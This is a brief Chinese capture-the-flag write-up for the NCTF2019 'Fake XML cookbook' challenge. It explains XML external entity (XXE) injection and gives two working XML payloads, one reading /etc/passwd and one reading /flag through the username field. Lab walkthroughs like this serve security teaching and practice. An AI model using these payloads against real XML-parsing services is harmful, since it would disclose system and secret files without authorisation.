[NCTF2019]Fake XML cookbook
xml实体注入,原理参考https://www.freebuf.com/vuls/175451.html
先抓包
添加恶意实体,读取/etc/passwd文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>
回显正常说明可以内部攻击
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>